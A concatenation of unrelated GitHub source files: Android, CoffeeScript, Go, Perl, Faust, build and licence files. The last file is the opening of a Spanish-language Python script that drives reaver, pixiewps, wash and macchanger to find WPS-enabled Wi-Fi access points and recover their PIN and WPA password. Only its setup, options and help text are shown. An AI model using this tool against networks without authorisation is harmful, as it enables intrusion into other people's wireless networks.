Punktnotation ist *nicht* für Windows Phone 7 verfügbar. Verwenden Sie `setItem` oder `getItem` , anstatt auf Tasten direkt aus dem Speicherobjekt, wie z.B.`window.localStorage.someKey`. | {
"pile_set_name": "Github"
} |
package com.ttdevs.android.transformers;
import android.content.Context;
import android.graphics.Point;
import androidx.viewpager.widget.ViewPager;
import android.util.AttributeSet;
import android.view.View;
public class MultiViewPager extends ViewPager {
/**
* Maximum width in pixels; a negative value means unconstrained.
*/
private int mMaxWidth = -1;
/**
* Maximum height in pixels; a negative value means unconstrained.
*/
private int mMaxHeight = -1;
/**
* Child view inside a page to match the page size against.
*/
private int mMatchWidthChildResId;
/**
* Internal state to schedule a new measurement pass.
*/
private boolean mNeedsMeasurePage;
private static void constrainTo(Point size, Point maxSize) {
if (maxSize.x >= 0) {
if (size.x > maxSize.x) {
size.x = maxSize.x;
}
}
if (maxSize.y >= 0) {
if (size.y > maxSize.y) {
size.y = maxSize.y;
}
}
}
public MultiViewPager(Context context) {
super(context);
}
public MultiViewPager(Context context, AttributeSet attrs) {
super(context, attrs);
init(context, attrs);
}
private void init(Context context, AttributeSet attrs) {
setClipChildren(false);
// TypedArray ta = context.obtainStyledAttributes(attrs, R.styleable.MultiViewPager);
// setMaxWidth(ta.getDimensionPixelSize(R.styleable.MultiViewPager_android_maxWidth, -1));
// setMaxHeight(ta.getDimensionPixelSize(R.styleable.MultiViewPager_android_maxHeight, -1));
// setMatchChildWidth(ta.getResourceId(R.styleable.MultiViewPager_matchChildWidth, 0));
// ta.recycle();
}
@Override
protected void onMeasure(int widthMeasureSpec, int heightMeasureSpec) {
Point size = new Point(
MeasureSpec.getSize(widthMeasureSpec),
MeasureSpec.getSize(heightMeasureSpec));
if (mMaxWidth >= 0 || mMaxHeight >= 0) {
Point maxSize = new Point(mMaxWidth, mMaxHeight);
constrainTo(size, maxSize);
widthMeasureSpec = MeasureSpec.makeMeasureSpec(
size.x,
MeasureSpec.EXACTLY);
heightMeasureSpec = MeasureSpec.makeMeasureSpec(
size.y,
MeasureSpec.EXACTLY);
}
super.onMeasure(widthMeasureSpec, heightMeasureSpec);
onMeasurePage(widthMeasureSpec, heightMeasureSpec);
}
protected void onMeasurePage(int widthMeasureSpec, int heightMeasureSpec) {
// Only measure if a measurement pass was scheduled
if (!mNeedsMeasurePage) {
return;
}
if (mMatchWidthChildResId == 0) {
mNeedsMeasurePage = false;
} else if (getChildCount() > 0) {
View child = getChildAt(0);
child.measure(widthMeasureSpec, heightMeasureSpec);
int pageWidth = child.getMeasuredWidth();
View match = child.findViewById(mMatchWidthChildResId);
if (match == null) {
throw new NullPointerException(
"MatchWithChildResId did not find that ID in the first fragment of the ViewPager; "
+ "is that view defined in the child view's layout? Note that MultiViewPager "
+ "only measures the child for index 0.");
}
int childWidth = match.getMeasuredWidth();
// Check that the measurement was successful
if (childWidth > 0) {
mNeedsMeasurePage = false;
int difference = pageWidth - childWidth;
setPageMargin(-difference);
int offscreen = (int) Math.ceil((float) pageWidth / (float) childWidth) + 1;
setOffscreenPageLimit(offscreen);
requestLayout();
}
}
}
@Override
protected void onSizeChanged(int w, int h, int oldw, int oldh) {
super.onSizeChanged(w, h, oldw, oldh);
// Schedule a new measurement pass as the dimensions have changed
mNeedsMeasurePage = true;
}
/**
* Sets the child view inside a page to match the page size against.
*
* @param matchChildWidthResId resource ID of the child view (inside the first page) whose width each page should match
*/
public void setMatchChildWidth(int matchChildWidthResId) {
if (mMatchWidthChildResId != matchChildWidthResId) {
mMatchWidthChildResId = matchChildWidthResId;
mNeedsMeasurePage = true;
}
}
/**
* Sets the maximum size.
*
* @param width maximum width in pixels, or -1 for no limit
*/
public void setMaxWidth(int width) {
mMaxWidth = width;
}
/**
* Sets the maximum size.
*
* @param height maximum height in pixels, or -1 for no limit
*/
public void setMaxHeight(int height) {
mMaxHeight = height;
}
}
| {
"pile_set_name": "Github"
} |
class Hotkeys extends SimpleModule
@count: 0
@keyNameMap:
# Keys with words or arrows on them
8:"Backspace", 9:"Tab", 13:"Enter", 16:"Shift", 17:"Control", 18:"Alt",
19:"Pause", 20:"CapsLock", 27:"Esc", 32:"Spacebar", 33:"PageUp",
34:"PageDown", 35:"End", 36:"Home", 37:"Left", 38:"Up", 39:"Right",
40:"Down", 45:"Insert", 46:"Del", 91: "Meta", 93: "Meta",
# Number keys on main keyboard (not keypad)
48:"0",49:"1",50:"2",51:"3",52:"4",53:"5",54:"6",55:"7",56:"8",57:"9",
# Letter keys. Note that we don't distinguish upper and lower case
# PS. String.fromCharCode
65:"A", 66:"B", 67:"C", 68:"D", 69:"E", 70:"F", 71:"G", 72:"H", 73:"I",
74:"J", 75:"K", 76:"L", 77:"M", 78:"N", 79:"O", 80:"P", 81:"Q", 82:"R",
83:"S", 84:"T", 85:"U", 86:"V", 87:"W", 88:"X", 89:"Y", 90:"Z",
# Keypad numbers and punctuation keys. (Opera does not support these.)
96:"0",97:"1",98:"2",99:"3",100:"4",101:"5",102:"6",103:"7",104:"8",105:"9",
106:"Multiply", 107:"Add", 109:"Subtract", 110:"Decimal", 111:"Divide",
# Function keys
112:"F1", 113:"F2", 114:"F3", 115:"F4", 116:"F5", 117:"F6",
118:"F7", 119:"F8", 120:"F9", 121:"F10", 122:"F11", 123:"F12",
124:"F13", 125:"F14", 126:"F15", 127:"F16", 128:"F17", 129:"F18",
130:"F19", 131:"F20", 132:"F21", 133:"F22", 134:"F23", 135:"F24",
# Punctuation keys that don't require holding down Shift
# Hyphen is nonportable: FF returns same code as Subtract
59:";", 61:"=", 186:";", 187:"=", # Firefox and Opera return 59,61
188:",", 190:".", 191:"/", 192:"`", 219:"[", 220:"\\", 221:"]", 222:"'"
@aliases:
"escape":"esc",
"delete":"del",
"return":"enter",
"ctrl":"control",
"space":"spacebar",
"ins":"insert",
"cmd": "meta",
"command": "meta",
"wins": "meta",
"windows": "meta"
@normalize: (shortcut) ->
keys = shortcut.toLowerCase().replace(/\s+/gi, "").split "+"
keys[i] = @aliases[key] or key for key, i in keys
keyname = keys.pop()
keys.sort().push keyname
keys.join "_"
opts:
el: document
_init: ->
@id = ++ @constructor.count
@_map = {}
@_delegate = if typeof @opts.el is "string" then document else @opts.el
$(@_delegate).on "keydown.simple-hotkeys-#{@id}", @opts.el, (e) =>
@_getHander(e)?.call this, e
_getHander: (e) ->
return unless keyname = @constructor.keyNameMap[e.which]
shortcut = ""
shortcut += "alt_" if e.altKey
shortcut += "control_" if e.ctrlKey
shortcut += "meta_" if e.metaKey
shortcut += "shift_" if e.shiftKey
shortcut += keyname.toLowerCase()
@_map[shortcut]
respondTo: (subject) ->
if typeof subject is 'string'
@_map[@constructor.normalize subject]?
else
@_getHander(subject)?
add: (shortcut, handler) ->
@_map[@constructor.normalize shortcut] = handler
@
remove: (shortcut) ->
delete @_map[@constructor.normalize shortcut]
@
destroy: ->
$(@_delegate).off ".simple-hotkeys-#{@id}"
@_map = {}
@
hotkeys = (opts) ->
new Hotkeys(opts)
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package extension
import (
"github.com/apache/dubbo-go/common"
"github.com/apache/dubbo-go/config_center"
)
var (
configCenters = make(map[string]func(config *common.URL) (config_center.DynamicConfiguration, error))
)
// SetConfigCenter sets the DynamicConfiguration with @name
func SetConfigCenter(name string, v func(*common.URL) (config_center.DynamicConfiguration, error)) {
configCenters[name] = v
}
// GetConfigCenter finds the DynamicConfiguration with @name
func GetConfigCenter(name string, config *common.URL) (config_center.DynamicConfiguration, error) {
if configCenters[name] == nil {
panic("config center for " + name + " is not existing, make sure you have import the package.")
}
return configCenters[name](config)
}
| {
"pile_set_name": "Github"
} |
package Paws::ECR::GetLifecyclePolicyPreviewResponse;
use Moose;
has LifecyclePolicyText => (is => 'ro', isa => 'Str', traits => ['NameInRequest'], request_name => 'lifecyclePolicyText' );
has NextToken => (is => 'ro', isa => 'Str', traits => ['NameInRequest'], request_name => 'nextToken' );
has PreviewResults => (is => 'ro', isa => 'ArrayRef[Paws::ECR::LifecyclePolicyPreviewResult]', traits => ['NameInRequest'], request_name => 'previewResults' );
has RegistryId => (is => 'ro', isa => 'Str', traits => ['NameInRequest'], request_name => 'registryId' );
has RepositoryName => (is => 'ro', isa => 'Str', traits => ['NameInRequest'], request_name => 'repositoryName' );
has Status => (is => 'ro', isa => 'Str', traits => ['NameInRequest'], request_name => 'status' );
has Summary => (is => 'ro', isa => 'Paws::ECR::LifecyclePolicyPreviewSummary', traits => ['NameInRequest'], request_name => 'summary' );
has _request_id => (is => 'ro', isa => 'Str');
### main pod documentation begin ###
=head1 NAME
Paws::ECR::GetLifecyclePolicyPreviewResponse
=head1 ATTRIBUTES
=head2 LifecyclePolicyText => Str
The JSON lifecycle policy text.
=head2 NextToken => Str
The C<nextToken> value to include in a future
C<GetLifecyclePolicyPreview> request. When the results of a
C<GetLifecyclePolicyPreview> request exceed C<maxResults>, this value
can be used to retrieve the next page of results. This value is C<null>
when there are no more results to return.
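As an illustrative sketch only (the service construction, region, and repository name below are assumptions for this example, not part of this class), a caller could use the token to page through the preview results:
    use Paws;
    my $ecr = Paws->service('ECR', region => 'us-east-1');
    my $token;
    do {
        my $preview = $ecr->GetLifecyclePolicyPreview(
            RepositoryName => 'my-repository',
            (defined $token ? (NextToken => $token) : ()),
        );
        # inspect $preview->PreviewResults here
        $token = $preview->NextToken;
    } while (defined $token);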
=head2 PreviewResults => ArrayRef[L<Paws::ECR::LifecyclePolicyPreviewResult>]
The results of the lifecycle policy preview request.
=head2 RegistryId => Str
The registry ID associated with the request.
=head2 RepositoryName => Str
The repository name associated with the request.
=head2 Status => Str
The status of the lifecycle policy preview request.
Valid values are: C<"IN_PROGRESS">, C<"COMPLETE">, C<"EXPIRED">, C<"FAILED">
=head2 Summary => L<Paws::ECR::LifecyclePolicyPreviewSummary>
The list of images that is returned as a result of the action.
=head2 _request_id => Str
=cut
1; | {
"pile_set_name": "Github"
} |
//
// AnswerCell.h
// BrowseOverflow
//
// Created by Graham Lee on 26/09/2011.
// Copyright (c) 2011 Fuzzy Aliens Ltd. All rights reserved.
//
#import <UIKit/UIKit.h>
@interface AnswerCell : UITableViewCell
@property (nonatomic, weak) IBOutlet UILabel *scoreLabel;
@property (nonatomic, weak) IBOutlet UILabel *acceptedIndicator;
@property (nonatomic, weak) IBOutlet UILabel *personName;
@property (nonatomic, weak) IBOutlet UIImageView *personAvatar;
@property (nonatomic, weak) IBOutlet UIWebView *bodyWebView;
@end
| {
"pile_set_name": "Github"
} |
The MIT License (MIT)
Copyright (c) Sindre Sorhus <[email protected]> (sindresorhus.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
| {
"pile_set_name": "Github"
} |
//-----------------------------------------------------------------------------
// DigitalRune Engine - Copyright (C) DigitalRune GmbH
// This file is subject to the terms and conditions defined in
// file 'LICENSE.TXT', which is part of this source code package.
//-----------------------------------------------------------------------------
//
/// \file MaterialMorphSkinned.fx
/// Combines the material of a model (e.g. textures) with the light buffer data.
/// Supports:
/// - Diffuse color/texture
/// - Specular color/texture
/// - Morphing (up to 5 morph targets)
/// - Mesh skinning (up to 72 bones)
//
//-----------------------------------------------------------------------------
#define MORPHING 1
#define SKINNING 1
#include "Material.fx"
| {
"pile_set_name": "Github"
} |
/*
* wm8580.h -- audio driver for WM8580
*
* Copyright 2008 Samsung Electronics.
* Author: Ryu Euiyoul
* [email protected]
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation; either version 2 of the License, or (at your
* option) any later version.
*
*/
#ifndef _WM8580_H
#define _WM8580_H
#define WM8580_PLLA 1
#define WM8580_PLLB 2
#define WM8580_MCLK 1
#define WM8580_CLKOUTSRC 2
#define WM8580_CLKSRC_MCLK 1
#define WM8580_CLKSRC_PLLA 2
#define WM8580_CLKSRC_PLLB 3
#define WM8580_CLKSRC_OSC 4
#define WM8580_CLKSRC_NONE 5
#define WM8580_CLKSRC_ADCMCLK 6
#define WM8580_DAI_PAIFRX 0
#define WM8580_DAI_PAIFTX 1
#endif
| {
"pile_set_name": "Github"
} |
<body>
<a id="id1">link 1</a>
<a id="id2">link 2</a>
<a id="id3">link 3</a>
</body>
| {
"pile_set_name": "Github"
} |
package chow
import (
"github.com/OpenWhiteBox/primitives/matrix"
)
// mixColumns is each 8x8 block of the binary MixColumns matrix.
var mixColumns = [4][4]matrix.Matrix{
[4]matrix.Matrix{
matrix.Matrix{
matrix.Row{0x80},
matrix.Row{0x81},
matrix.Row{0x02},
matrix.Row{0x84},
matrix.Row{0x88},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
},
matrix.Matrix{
matrix.Row{0x81},
matrix.Row{0x83},
matrix.Row{0x06},
matrix.Row{0x8c},
matrix.Row{0x98},
matrix.Row{0x30},
matrix.Row{0x60},
matrix.Row{0xc0},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
},
[4]matrix.Matrix{
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x80},
matrix.Row{0x81},
matrix.Row{0x02},
matrix.Row{0x84},
matrix.Row{0x88},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
},
matrix.Matrix{
matrix.Row{0x81},
matrix.Row{0x83},
matrix.Row{0x06},
matrix.Row{0x8c},
matrix.Row{0x98},
matrix.Row{0x30},
matrix.Row{0x60},
matrix.Row{0xc0},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
},
[4]matrix.Matrix{
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x80},
matrix.Row{0x81},
matrix.Row{0x02},
matrix.Row{0x84},
matrix.Row{0x88},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
},
matrix.Matrix{
matrix.Row{0x81},
matrix.Row{0x83},
matrix.Row{0x06},
matrix.Row{0x8c},
matrix.Row{0x98},
matrix.Row{0x30},
matrix.Row{0x60},
matrix.Row{0xc0},
},
},
[4]matrix.Matrix{
matrix.Matrix{
matrix.Row{0x81},
matrix.Row{0x83},
matrix.Row{0x06},
matrix.Row{0x8c},
matrix.Row{0x98},
matrix.Row{0x30},
matrix.Row{0x60},
matrix.Row{0xc0},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x80},
matrix.Row{0x81},
matrix.Row{0x02},
matrix.Row{0x84},
matrix.Row{0x88},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
},
},
}
// unMixColumns is the same as mixColumns, except each block is inverted.
var unMixColumns = [4][4]matrix.Matrix{
[4]matrix.Matrix{
matrix.Matrix{
matrix.Row{0x03},
matrix.Row{0x04},
matrix.Row{0x09},
matrix.Row{0x11},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
matrix.Row{0x01},
},
matrix.Matrix{
matrix.Row{0xfe},
matrix.Row{0x03},
matrix.Row{0x07},
matrix.Row{0xf0},
matrix.Row{0x1f},
matrix.Row{0x3f},
matrix.Row{0x7f},
matrix.Row{0xff},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
},
[4]matrix.Matrix{
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x03},
matrix.Row{0x04},
matrix.Row{0x09},
matrix.Row{0x11},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
matrix.Row{0x01},
},
matrix.Matrix{
matrix.Row{0xfe},
matrix.Row{0x03},
matrix.Row{0x07},
matrix.Row{0xf0},
matrix.Row{0x1f},
matrix.Row{0x3f},
matrix.Row{0x7f},
matrix.Row{0xff},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
},
[4]matrix.Matrix{
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x03},
matrix.Row{0x04},
matrix.Row{0x09},
matrix.Row{0x11},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
matrix.Row{0x01},
},
matrix.Matrix{
matrix.Row{0xfe},
matrix.Row{0x03},
matrix.Row{0x07},
matrix.Row{0xf0},
matrix.Row{0x1f},
matrix.Row{0x3f},
matrix.Row{0x7f},
matrix.Row{0xff},
},
},
[4]matrix.Matrix{
matrix.Matrix{
matrix.Row{0xfe},
matrix.Row{0x03},
matrix.Row{0x07},
matrix.Row{0xf0},
matrix.Row{0x1f},
matrix.Row{0x3f},
matrix.Row{0x7f},
matrix.Row{0xff},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x01},
matrix.Row{0x02},
matrix.Row{0x04},
matrix.Row{0x08},
matrix.Row{0x10},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
},
matrix.Matrix{
matrix.Row{0x03},
matrix.Row{0x04},
matrix.Row{0x09},
matrix.Row{0x11},
matrix.Row{0x20},
matrix.Row{0x40},
matrix.Row{0x80},
matrix.Row{0x01},
},
},
}
| {
"pile_set_name": "Github"
} |
namespace uTinyRipper.Classes.GraphicsSettingss
{
public enum LightmapStrippingMode
{
Automatic = 0,
Custom = 1,
}
}
| {
"pile_set_name": "Github"
} |
<RCC>
<qresource prefix="/logos">
<file alias="placeholder">assets/logos/png/media-optical-symbolic.png</file>
<file alias="folder">assets/logos/png/icon_folder.png</file>
<file alias="workstation">assets/logos/png/workstation-logo_color.png</file>
<file alias="server">assets/logos/png/server-logo_color.png</file>
<file alias="cinnamon">assets/logos/png/cinnamon_icon_grey_pattern.png</file>
<file alias="kde">assets/logos/png/kde_icon_grey_pattern.png</file>
<file alias="lxde">assets/logos/png/lxde_icon_grey_pattern.png</file>
<file alias="lxqt">assets/logos/png/lxqt_icon_grey_pattern.png</file>
<file alias="mate">assets/logos/png/mate-compiz_icon_grey_pattern.png</file>
<file alias="soas">assets/logos/png/soas_icon_grey_pattern.png</file>
<file alias="xfce">assets/logos/png/xfce_icon_grey_pattern.png</file>
<file alias="astronomy">assets/logos/png/astronomy_icon_grey_pattern.png</file>
<file alias="design">assets/logos/png/design-suite_icon_grey_pattern.png</file>
<file alias="games">assets/logos/png/games_icon_grey_pattern.png</file>
<file alias="jam">assets/logos/png/jam_icon_grey_pattern.png</file>
<file alias="robotics">assets/logos/png/robotics_icon_grey_pattern.png</file>
<file alias="scientific">assets/logos/png/scientific_icon_grey_pattern.png</file>
<file alias="security">assets/logos/png/security-lab_icon_grey_pattern.png</file>
</qresource>
<qresource prefix="/">
<file alias="metadata.json">assets/metadata.json</file>
<file alias="releases.json">assets/releases.json</file>
<file alias="focusRect">assets/focusrect.png</file>
</qresource>
</RCC>
| {
"pile_set_name": "Github"
} |
{
"id": "record-player",
"name": "Record Player",
"category": "Furniture",
"games": {
"nl": {
"orderable": true,
"sellPrice": {
"currency": "bells",
"value": 350
},
"sources": [
"Nookling stores"
],
"buyPrices": [
{
"currency": "bells",
"value": 1400
}
]
}
}
} | {
"pile_set_name": "Github"
} |
# add a target to generate API documentation with Doxygen
find_package(Doxygen)
if(DOXYGEN_FOUND)
SET(OUTPUT_DIR "${CMAKE_CURRENT_BINARY_DIR}/documentation/doxygen")
FILE(MAKE_DIRECTORY "${OUTPUT_DIR}")
FILE(TO_NATIVE_PATH ${OUTPUT_DIR} OUTPUT_DIR)
SET(OUTPUT_DIR \"${OUTPUT_DIR}\")
SET(INPUTS "${CMAKE_CURRENT_SOURCE_DIR}/code" "${CMAKE_CURRENT_SOURCE_DIR}/freespace2" "${CMAKE_CURRENT_SOURCE_DIR}/fred2" "${CMAKE_CURRENT_SOURCE_DIR}/wxfred2")
SET(INPUT_DIRS)
FOREACH(DIR IN LISTS INPUTS)
FILE(TO_NATIVE_PATH ${DIR} native_dir)
LIST(APPEND INPUT_DIRS \"${native_dir}\")
ENDFOREACH(DIR)
STRING(REPLACE ";" " " INPUT_DIRS "${INPUT_DIRS}")
CONFIGURE_FILE(${CMAKE_CURRENT_SOURCE_DIR}/fs2open.Doxyfile.in
${CMAKE_CURRENT_BINARY_DIR}/fs2open.Doxyfile
@ONLY)
add_custom_target(doxygen
${DOXYGEN_EXECUTABLE} ${CMAKE_CURRENT_BINARY_DIR}/fs2open.Doxyfile
WORKING_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}
COMMENT "Generating API documentation with Doxygen" VERBATIM
)
set_target_properties(doxygen
PROPERTIES
FOLDER "Documentation"
EXCLUDE_FROM_ALL ON
EXCLUDE_FROM_DEFAULT_BUILD ON
)
endif(DOXYGEN_FOUND)
| {
"pile_set_name": "Github"
} |
declare name "dbmeter";
declare version "1.0";
declare author "Grame";
declare license "BSD";
declare copyright "(c)GRAME 2006";
//-------------------------------------------------
// A dB Vumeter
//-------------------------------------------------
import("math.lib");
import("music.lib");
vmeter(x) = attach(x, envelop(x) : vbargraph("dB", -96, 10));
hmeter(x) = attach(x, envelop(x) : hbargraph("dB", -96, 10));
envelop = abs : max(db2linear(-96)) : linear2db : min(10) : max ~ -(96.0/SR);
process = vmeter; | {
"pile_set_name": "Github"
} |
from os import kill, system, path, chdir
from signal import alarm, signal, SIGALRM, SIGKILL
import time
import subprocess
from re import sub, compile, search
from sys import argv
REAVER = 'reaver'
PIXIEWPS = 'pixiewps'
WASH = 'wash'
AIRMON = 'airmon-ng'
MACCHANGER = 'macchanger'
GIT = 'git'
INFO = '\033[32m[+] \033[0m' # Verde
ALERTA = '\033[31m[!] \033[0m' # Rojo
INPUT = '\033[34m[>] \033[0m' # Azul
DATA = '\033[33m[DATA] \033[0m' #Amarillo
OPCION = '\033[33m[!!!] \033[0m' #Amarillo
USE_REAVER = False # Si False usa wash y termina.
USE_PIXIEWPS = False # Intenta averiguar el pin WPS con pixiewps
WASH_TIME = 11 # Tiempo para que wash recopile APs con WPS
WASH_CHANNEL = '' # Todos
REAVER_TIME = 6 # Tiempo para que reaver recopile la informacion
CHOICES_YES = ['S', 's', '', 'si', 'Si']
CHOICES_NOPE = ['N', 'n', 'no', 'No']
PROMPT_APS = False
OUTPUT = False
OUTPUT_FILE = 'data.txt'
PRINT_REAVER = True
PRINT_PIXIE = True
GET_PASSWORD = False
FOREVER = False
OVERRIDE = False
def banner():
"""
Imprime el banner en la pantalla
"""
print
print "\t ____ _ "
print "\t| _ \ _ ___ _(_) _____ ___ __ ___ "
print "\t| |_) | | | \ \/ / |/ _ \ \ /\ / / \'_ \/ __|"
print "\t| __/| |_| |> <| | __/\ V V /| |_) \__ \\"
print "\t|_| \__, /_/\_\_|\___| \_/\_/ | .__/|___\\"
print "\t |___/ |_| "
print
print "\tHecho por jgilhutton"
print "\tReaver 1.5.2 mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & kib0rg"
print "\tCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>"
print "\tPixiewps Copyright (c) 2015, wiire <[email protected]>"
print "\tMacchanger por Alvaro Ortega Copyright (C) 2003 Free Software Foundation, Inc."
print
def arg_parser():
"""
Detecta los argumentos y devuelve la ayuda si hay algun problema
"""
global PRINT_PIXIE
global PRINT_REAVER
global USE_REAVER
global USE_PIXIEWPS
global WASH_TIME
global REAVER_TIME
global WASH_CHANNEL
global PROMPT_APS
global OUTPUT_FILE
global OUTPUT
global GET_PASSWORD
global FOREVER
global OVERRIDE
H = ['-h','--help']
binary_flags = ['-w','-t','-c','-o']
for arg in argv[1:]:
if arg in H:
help()
exit()
elif argv[argv.index(arg)-1] in binary_flags:
continue
elif arg == '-q' or arg == '--quiet':
PRINT_PIXIE = False
PRINT_REAVER = False
elif arg == '-r' or arg == '--use-reaver':
USE_REAVER = True
elif arg == '-p' or arg == '--use-pixie':
USE_PIXIEWPS = True
elif arg == '-w' or arg == '--wash-time':
try:
WASH_TIME = int(argv[argv.index(arg)+1])
except ValueError:
help()
elif arg == '-t' or arg == '--tiempo':
try:
REAVER_TIME = int(argv[argv.index(arg)+1])
except ValueError:
help()
elif arg == '-c' or arg == '--canal':
try:
WASH_CHANNEL = int(argv[argv.index(arg)+1])
except ValueError:
help()
elif arg == '-P' or arg == '--prompt':
PROMPT_APS = True
elif arg == '-o' or arg == '--output':
OUTPUT = True
OUTPUT_FILE = argv[argv.index(arg)+1]
elif arg == '-f' or arg == '--pass':
GET_PASSWORD = True
elif arg == '-F' or arg == '--forever':
FOREVER = True
elif arg == '-O' or arg == '--override':
OVERRIDE = True
else:
help()
def help():
"""
Muestra la ayuda y sale
"""
print
print "script -r -p -w 15 -t 6 -c 7 -P -o file.txt -f"
print "script --use-reaver --use-pixie --wash-time 15 --tiempo 6 --canal 7 --prompt --output file.txt -h"
print
print '\t-r --use-reaver Captura la informacion del AP con Reaver. [False]'
print '\t-p --use-pixie Una vez que captura la informacion con Reaver [False]'
print '\t intenta sacar el pin WPS del router.'
print '\t-w --wash-time [tiempo] Setea el tiempo que va a usar para enumerar los [15]'
print '\t ap con WPS.'
print '\t-t --tiempo [tiempo] Setea el tiempo que va a usar para recolectar la [6]'
print '\t informacion del AP.'
print '\t-c --canal [canal] Proporciona el canal en el que escucha para enumerar'
print '\t los AP con WPS. Si no se usa, se escanean todos los canales.'
print '\t-P --prompt Si se encuentra mas de un AP con WPS, preguntar a cual [False]'
print '\t se quiere atacar.'
print '\t-o --output [archivo] Graba los datos en un archivo de texto.'
print '\t-f --pass Si se tiene exito al averiguar el pin WPS, tambien'
print '\t tratar de averiguar la clave WPA.'
print '\t-q --quiet No muestra la informacion recopilada.'
print '\t-F --forever Corre el programa indefinidamente hasta que se lo interrumpa'
print '\t-O --override Vuelve a atacar APs con pines que ya han sido conseguidos'
print '\t sin preguntar.'
print
exit()
class Engine():
"""
